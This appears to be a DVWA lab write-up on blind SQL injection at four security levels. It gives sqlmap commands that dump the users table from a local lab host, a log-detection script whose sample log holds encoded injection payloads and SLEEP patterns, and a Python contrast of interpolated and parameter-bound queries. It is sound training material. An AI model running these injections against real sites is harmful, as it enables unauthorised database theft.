Previous posts:
DVWA lab - Brute Force Source (brute-force attack)
DVWA lab - Command Injection
DVWA lab - CSRF (cross-site request forgery)
DVWA lab - File Inclusion
DVWA lab - File Upload
DVWA lab - SQL Injection
Setting up the lab environment
https://github.com/ethicalhack3r/DVWA
[Network security study notes, appendix]: Setting up the DVWA lab
Contents
SQL Injection (Blind)
Low SQL Injection (Blind)
Core code
Medium SQL Injection (Blind)
Core code
High SQL Injection (Blind)
Core code
Impossible SQL Injection (Blind)
Core code
Low SQL Injection (Blind)
Core code
```php
<?php
// Note: the start of this snippet (reading $id from the GET request, running the
// query and counting the result rows into $num) was cut off in extraction;
// only the condition line is restored here.
if( $num > 0 ) {
    echo '<pre>User ID exists in the database.</pre>';
}
else {
    header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
    echo '<pre>User ID is MISSING from the database.</pre>';
}

((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
} // closes the enclosing "form submitted" block, whose opening was also cut off
?>
```
Because blind SQL injection is quite time-consuming, the author uses the sqlmap tool here to perform the injection.
List the current database name:
```shell
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --current-db
```
List the table names:
```shell
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 --tables
```
Dump the data in the users table:
```shell
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 -T users --dump --batch
```
Medium SQL Injection (Blind)
Core code
```php
<?php
// Note: the start of this snippet (reading $id from the POST body, running the
// query and counting the result rows into $num) was cut off in extraction;
// only the condition line is restored here.
if( $num > 0 ) {
    // Feedback for end user
    echo '<pre>User ID exists in the database.</pre>';
}
else {
    // Feedback for end user
    echo '<pre>User ID is MISSING from the database.</pre>';
}

//mysql_close();
} // closes the enclosing "form submitted" block, whose opening was also cut off
?>
```
It is easy to see that the submission method has changed from GET to POST.
Capture the POST request with Burp Suite and save the packet to a file named post.r:
```shell
vim post.r
sqlmap -r post.r -D dvwa1 -T users --dump --batch
```
High SQL Injection (Blind)
Core code
```php
<?php
// Note: the start of this snippet (reading $id from the cookie, running the
// query and counting the result rows into $num) was cut off in extraction;
// only the condition line is restored here.
if( $num > 0 ) {
    // Feedback for end user
    echo '<pre>User ID exists in the database.</pre>';
}
else {
    // Might sleep a random amount
    if( rand( 0, 5 ) == 3 ) {
        sleep( rand( 2, 4 ) );
    }

    // User wasn't found, so the page wasn't!
    header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

    // Feedback for end user
    echo '<pre>User ID is MISSING from the database.</pre>';
}

((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
} // closes the enclosing "form submitted" block, whose opening was also cut off
?>
```
Compared with the previous two levels, the id value here is passed through a cookie, and a random sleep is added, which increases the time cost of blind injection.
Get the current database name:
```shell
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1*; security=high; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --dbms=MySQL --technique=B --random-agent --flush-session -v 3 --current-db
```
As for the user names and passwords, since that takes too much time, the author does not go into it here.
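The same probing that sqlmap performs against the Low level leaves a characteristic trace on the server side: a burst of requests to one endpoint whose id parameter carries quotes, boolean conditions or sleep calls, with the 200/404 answers alternating as each true/false question is asked. The following detection script is an added example (not from the original post or from DVWA) that parses constructed Apache combined-format log lines and reports clients showing that pattern; the hosts, timestamps and request lines are made up, and the path suffix `/sqli_blind/` is assumed from the URLs used above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (Apache "combined" format). The addresses,
# timestamps and requests are made up for this example, not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [10/May/2020:12:00:01 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
192.0.2.10 - - [10/May/2020:12:00:02 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2020:12:00:05 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%20AND%201%3D1%20--%20&Submit=Submit HTTP/1.1" 200 4120 "-" "sqlmap/1.4"
198.51.100.7 - - [10/May/2020:12:00:05 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%20AND%201%3D2%20--%20&Submit=Submit HTTP/1.1" 404 4130 "-" "sqlmap/1.4"
198.51.100.7 - - [10/May/2020:12:00:06 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%20AND%20SLEEP%283%29%20--%20&Submit=Submit HTTP/1.1" 200 4120 "-" "sqlmap/1.4"
198.51.100.7 - - [10/May/2020:12:00:09 +0800] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%20AND%201%3D1%20--%20&Submit=Submit HTTP/1.1" 200 4120 "-" "sqlmap/1.4"
"""

# One Apache "combined" log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Tokens that never belong in a legitimate numeric user id.
BOOLEAN_TOKENS = re.compile(r"(\bAND\b|\bOR\b|['\"]|--|#|/\*)", re.IGNORECASE)
TIME_TOKENS = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b", re.IGNORECASE)
# Assumed endpoint suffix, taken from the URLs used in this write-up.
TARGET_SUFFIX = "/sqli_blind/"


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    rec["path"] = url.path
    rec["id"] = params.get("id", [""])[0]
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return the set of indicator labels for one request (empty if it looks benign)."""
    labels = set()
    if rec is None or not rec["path"].endswith(TARGET_SUFFIX):
        return labels
    if not rec["id"].isdigit():
        labels.add("non-numeric-id")
    if BOOLEAN_TOKENS.search(rec["id"]):
        labels.add("boolean-payload")
    if TIME_TOKENS.search(rec["id"]):
        labels.add("time-payload")
    if "sqlmap" in rec["agent"].lower():
        labels.add("scanner-agent")
    return labels


def analyze(log_text, min_hits=2):
    """Aggregate flagged requests per client.

    A client with at least min_hits flagged requests is reported, together with
    the labels seen and the status codes of its flagged requests. Seeing both
    200 and 404 on flagged requests is the boolean oracle being read: the page
    answers "exists" or "MISSING" depending on whether the injected condition held.
    """
    per_ip = defaultdict(lambda: {"total": 0, "hits": 0, "labels": set(), "statuses": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_ip[rec["ip"]]
        entry["total"] += 1
        labels = classify(rec)
        if labels:
            entry["hits"] += 1
            entry["labels"] |= labels
            entry["statuses"].add(rec["status"])
    return {ip: e for ip, e in per_ip.items() if e["hits"] >= min_hits}


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry["hits"], "of", entry["total"], "requests flagged:",
              sorted(entry["labels"]), "statuses", sorted(entry["statuses"]))
```

The query-string check only sees what the Low level sends: for the Medium level the id travels in the POST body and for the High level in the Cookie header, neither of which a default access log records, so for those levels the same logic has to run where the body or cookie is visible (a reverse proxy, WAF, or application-level logging of the id parameter). A second cheap signal that survives all three levels is the rate of 404 responses from a single client on an endpoint that normally returns 200.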
Impossible SQL Injection (Blind)
Core code
```php
<?php
// Note: the start of this snippet (the anti-CSRF token check, reading $id, and
// the openings of the enclosing blocks) was cut off in extraction; the
// "$data = $db->" prefix is restored here from the $data->bindParam() call below.
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();

// Get results
if( $data->rowCount() == 1 ) {
    // Feedback for end user
    echo '<pre>User ID exists in the database.</pre>';
}
else {
    // User wasn't found, so the page wasn't!
    header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

    // Feedback for end user
    echo '<pre>User ID is MISSING from the database.</pre>';
}
}
} // the two braces above close enclosing blocks whose openings were cut off

// Generate Anti-CSRF token
generateSessionToken();
?>
```
As can be seen, the Impossible level defends against SQL injection with PDO prepared statements (prepare and bindParam with PDO::PARAM_INT), and also adds a token verification mechanism, further improving its security.
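To make the contrast between the Low and Impossible levels concrete, the following is an added example (not code from the original post or from DVWA) that models both in Python against an in-memory SQLite table: `lookup_low` interpolates the raw id into the SQL text the way the Low level does, `lookup_bound_only` binds the id as a parameter, and `lookup_impossible` adds the numeric check and the exactly-one-row test of the Impossible level. The users rows and the `is_numeric` helper (an approximation of PHP's function) are constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the users table; rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn


def lookup_low(conn, user_input):
    """Models the Low level: the raw id becomes part of the SQL text, so any
    SQL inside it is executed. Errors are suppressed, as DVWA does with '@'."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_input}';"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        rows = []
    return "exists" if len(rows) > 0 else "missing"


def lookup_bound_only(conn, user_input):
    """Parameter binding alone: the whole input is compared as one literal value,
    so nothing inside it is ever parsed as SQL."""
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1;",
        (user_input,),
    ).fetchall()
    return "exists" if len(rows) == 1 else "missing"


def is_numeric(s):
    """Approximation of PHP is_numeric() for integer-looking strings (assumed helper)."""
    return s.strip().lstrip("+-").isdigit()


def lookup_impossible(conn, user_input):
    """Models the Impossible level: reject non-numeric input first, bind the id
    as an integer (PDO::PARAM_INT), and require exactly one row."""
    if not is_numeric(user_input):
        return "missing"
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1;",
        (int(user_input),),
    ).fetchall()
    return "exists" if len(rows) == 1 else "missing"


def compare(conn, inputs):
    """Run every input through all three lookups; returns {input: (low, bound, impossible)}."""
    return {
        s: (lookup_low(conn, s), lookup_bound_only(conn, s), lookup_impossible(conn, s))
        for s in inputs
    }


if __name__ == "__main__":
    db = make_db()
    # The two non-numeric inputs are a true and a false condition appended to a
    # valid id; only the Low lookup answers them differently (the blind oracle).
    for s, answers in compare(db, ["1", "1' AND '1'='1", "1' AND '1'='2"]).items():
        print(repr(s), "low/bound/impossible ->", answers)
```

Run as a script, the Low column answers "exists" for the true condition and "missing" for the false one, which is exactly the one bit per request that boolean-based blind injection reads; the bound and Impossible columns return "missing" for both, because the input is compared as a single value rather than interpreted. The numeric check in the Impossible level is defence in depth on top of binding: binding alone already closes the injection, and the check additionally keeps garbage out of the query and the logs.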
References:
https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-31
https://www.freebuf.com/articles/web/119467.html